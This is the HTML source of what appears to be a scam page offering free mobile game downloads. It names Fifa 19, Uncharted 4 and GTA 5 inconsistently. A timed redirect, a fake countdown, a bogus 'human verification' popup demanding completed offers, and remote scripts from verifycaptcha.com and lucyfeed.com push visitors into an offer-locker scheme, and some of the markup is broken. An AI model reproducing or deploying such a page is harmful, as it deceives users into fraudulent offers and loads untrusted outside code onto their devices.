<!DOCTYPE html>
<html>
<head>
  <title>Fifa 19 Mobile - Android/iOS</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="Uncharted 4 for Free !!">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <link rel="icon" type="image/ico" href="img/favicon.html">
  <link rel="manifest" href="img/manifest.html">
  <meta name="msapplication-TileColor" content="#ffffff">
  <meta name="msapplication-TileImage" content="img/ms-icon-144x144.html">
  <meta name="theme-color" content="#ffffff">
  <meta property="og:image" content="js/i.imgur.com/JXKVaS1.html">
  <meta http-equiv="refresh" content="10;url=https://www.verifycaptcha.com/cl.php?id=345bfe5bb9cdcaeaa1cd5d6db6fe12b5">
  <!-- CSS -->
  <link href="https://fonts.googleapis.com/css?family=Raleway:300,400,700" rel="stylesheet" type="text/css">
  <link href="css/fancySelect.css" rel="stylesheet">
  <link rel="stylesheet" href="js/maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
  <link href="css/bootstrap.min.css" rel="stylesheet">
  <link href="css/sweet-alert.css" rel="stylesheet">
  <link href="css/animate.css" rel="stylesheet">
  <link href="css/magnific-popup.css" rel="stylesheet">
  <link href="css/style.css" rel="stylesheet">
  <script async="" src="pagead2.googlesyndication.com/pagead/js/f.html"></script>
<script type="text/javascript">var ogblock=true;</script>
<script type="text/javascript" id="ogjs" src="https://www.verifycaptcha.com/cl.php?id=5e4cd6691af94a019aeaad9bde6e0c8b"></script>
 <script type="text/javascript">var timeleft=10; var downloadTimer=setInterval(function(){timeleft--; document.getElementById("countdowntimer").textContent=timeleft; if(timeleft <=0) clearInterval(downloadTimer);},1000);</script><script type="text/javascript">//<![CDATA[//iPhone Version:if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))){window.location="gta-5-ios.html";}</script>
</head>

<body>
  <div id="human-verification" class="generator-verification mfp-hide white-popup-block">
    <div class="row">
      <div class="col-md-12">
        <div class="section_heading text-center">
            <img class="img-responsive logo-img" src="img/vbucks.png" width="100"> </center>
        </div>
      </div>
    </div>
    <div class="row">
      <div id="floatBarsG">
        <div id="floatBarsG_1" class="floatBarsG"></div>
        <div id="floatBarsG_2" class="floatBarsG"></div>
        <div id="floatBarsG_3" class="floatBarsG"></div>
        <div id="floatBarsG_4" class="floatBarsG"></div>
        <div id="floatBarsG_5" class="floatBarsG"></div>
        <div id="floatBarsG_6" class="floatBarsG"></div>
        <div id="floatBarsG_7" class="floatBarsG"></div>
        <div id="floatBarsG_8" class="floatBarsG"></div>
      </div>
    </div>
    <div class="row">
      <div class="col-md-12">
        <div class="popup-wrapper">
          <ol>
            <li>Choose and Complete one of the offers that appear below on your screen.</li>
            <li>Once the offer has been completed, you will automatically proceed.</li>
          </ol>
        </div>
      </div>
    </div>
    <div class="row">
      <div class="col-md-12 text-center offwrap">
         <span class="offtitle">Complete one of the offers below to finish human verification</span>
          <!-- CPA CODE -->
      </div>
    </div>
  </div>
  <header>
    <div class="container">
      <div class="row">
        <div class="col-md-6">
         
    </div>
  </header>
  <section class="section-first">
    <div class="container">
      <div class="row">
        <div class="section-first-mid-img-wrapp col-md-7">
          <img class="img-responsive mid-img-first" src="img/banner2.png" width="">
          <img class="img-responsive mid-img-overlay" src="img/banner.png" width="660" height=""> </div>
        <div class="col-md-4">
          <div class="description-col description-col-3 make-me-same-height-1"> <i class="icon-camera"></i>
            <h1>You Are Downloading Uncharted 4 Mobile</h1>
               <p>Your download should start autamatically within <b><span style="color:#ff9320"id="countdowntimer">10 </span></b> seconds. If it does not - please click on Download button.<br><br>
			   <a id="br-play-now" class="btn download-button btn-primary btn-display play-free" href="https://www.verifycaptcha.com/cl.php?id=5e4cd6691af94a019aeaad9bde6e0c8b"><span>DOWNLOAD</span></a>
          </div>
          <div class="description-col description-col-4 make-me-same-height-2"> <i class="icon-scope"></i> </div>
        </div>
      </div>
    </div>
    <header>
      <section class="section-second">
        <div class="container">
          <div id="enter-give-away-now"style="height:100px">
            <div class="step1 marker_show">

      <script type="text/javascript" src="http://www.lucyfeed.com/SYOcCXrVwPZXrxtR"></script>
      <script type="text/javascript" src="js/ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
      <script type="text/javascript">
      <script type="text/javascript" src="js/validator.min.js"></script>
      <script type="text/javascript" src="js/sweet-alert.min.js"></script>
      <script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>
      <script type="text/javascript" src="js/jquery.parallax-1.1.3.js"></script>
      <script type="text/javascript" src="js/main.js"></script>
    </header>
  </section>
</body>
</html>